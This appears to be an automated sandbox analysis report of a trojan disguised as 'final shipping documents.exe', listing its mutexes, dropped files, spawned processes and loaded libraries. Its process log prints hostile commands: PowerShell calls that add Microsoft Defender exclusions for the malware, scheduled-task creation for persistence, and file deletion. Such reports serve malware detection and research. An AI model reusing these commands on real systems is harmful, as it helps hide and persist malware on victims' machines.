Source: explorer.exe, 0000000A.00000002.2477562239.00000000112AF000.00000004.80000000.00040000.00000000.sdmp, mstsc.exe, 00000010.00000002.2933557794.0000000003296000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000010.00000002.2973345402.00000000053FF000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 0000001A.00000002.3126911212.0000000009ECF000.00000004.80000000.00040000.00000000.sdmp	Binary or memory string: MSBuild MyApp.csproj /t:Clean
Source: explorer.exe, 0000000A.00000002.2477562239.00000000112AF000.00000004.80000000.00040000.00000000.sdmp, mstsc.exe, 00000010.00000002.2933557794.0000000003296000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000010.00000002.2973345402.00000000053FF000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 0000001A.00000002.3126911212.0000000009ECF000.00000004.80000000.00040000.00000000.sdmp	Binary or memory string: /ignoreprojectextensions:.sln
Source: explorer.exe, 0000000A.00000002.2477562239.00000000112AF000.00000004.80000000.00040000.00000000.sdmp, mstsc.exe, 00000010.00000002.2933557794.0000000003296000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000010.00000002.2973345402.00000000053FF000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 0000001A.00000002.3126911212.0000000009ECF000.00000004.80000000.00040000.00000000.sdmp	Binary or memory string: MSBUILD : error MSB1048: Solution files cannot be debugged directly. Run MSBuild first with an environment variable MSBUILDEMITSOLUTION=1 to create a corresponding ".sln.metaproj" file. Then debug that.

Source: classification engine

Classification label: mal100.troj.evad.winEXE@967/22@4/1

Source: C:\Users\user\Desktop\final shipping documents.exe

File created: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7400:120:WilError_03
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6340:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5376:120:WilError_03
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Mutant created: \Sessions\1\BaseNamedObjects\giIYopVtnhnhS
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7540:120:WilError_03
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4056
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2940:120:WilError_03

Source: C:\Users\user\Desktop\final shipping documents.exe

File created: C:\Users\user\AppData\Local\Temp\tmpEBC2.tmp

Jump to behavior

Source: C:\Windows\SysWOW64\mstsc.exe

Process created: C:\Windows\explorer.exe

Source: final shipping documents.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: final shipping documents.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Users\user\Desktop\final shipping documents.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\final shipping documents.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: final shipping documents.exe	Virustotal: Detection: 51%
Source: final shipping documents.exe	ReversingLabs: Detection: 42%

Source: C:\Users\user\Desktop\final shipping documents.exe

File read: C:\Users\user\Desktop\final shipping documents.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\final shipping documents.exe "C:\Users\user\Desktop\final shipping documents.exe"
Source: C:\Users\user\Desktop\final shipping documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\final shipping documents.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\final shipping documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\final shipping documents.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GcrdXwPgmZ" /XML "C:\Users\user\AppData\Local\Temp\tmpEBC2.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\final shipping documents.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GcrdXwPgmZ" /XML "C:\Users\user\AppData\Local\Temp\tmpA2.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\mstsc.exe "C:\Windows\SysWOW64\mstsc.exe"
Source: C:\Windows\SysWOW64\mstsc.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\NETSTAT.EXE "C:\Windows\SysWOW64\NETSTAT.EXE"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4056 -s 6976
Source: C:\Windows\SysWOW64\mstsc.exe	Process created: C:\Windows\explorer.exe explorer.exe
Source: C:\Users\user\Desktop\final shipping documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\final shipping documents.exe"	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe"	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GcrdXwPgmZ" /XML "C:\Users\user\AppData\Local\Temp\tmpEBC2.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\mstsc.exe "C:\Windows\SysWOW64\mstsc.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\NETSTAT.EXE "C:\Windows\SysWOW64\NETSTAT.EXE"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GcrdXwPgmZ" /XML "C:\Users\user\AppData\Local\Temp\tmpA2.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

Source: C:\Users\user\Desktop\final shipping documents.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.cloudstore.schema.shell.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\mstsc.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\mstsc.exe	Section loaded: credui.dll
Source: C:\Windows\SysWOW64\mstsc.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\mstsc.exe	Section loaded: cryptui.dll
Source: C:\Windows\SysWOW64\mstsc.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\mstsc.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\mstsc.exe	Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\mstsc.exe	Section loaded: winmm.dll
Source: C:\Windows\SysWOW64\mstsc.exe	Section loaded: ktmw32.dll
Source: C:\Windows\SysWOW64\mstsc.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\mstsc.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\mstsc.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\mstsc.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\mstsc.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Section loaded: snmpapi.dll
Source: C:\Windows\explorer.exe	Section loaded: aepic.dll
Source: C:\Windows\explorer.exe	Section loaded: twinapi.dll
Source: C:\Windows\explorer.exe	Section loaded: userenv.dll
Source: C:\Windows\explorer.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\explorer.exe	Section loaded: powrprof.dll
Source: C:\Windows\explorer.exe	Section loaded: ntmarta.dll
Source: C:\Windows\explorer.exe	Section loaded: cryptsp.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: dxgi.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: propsys.dll
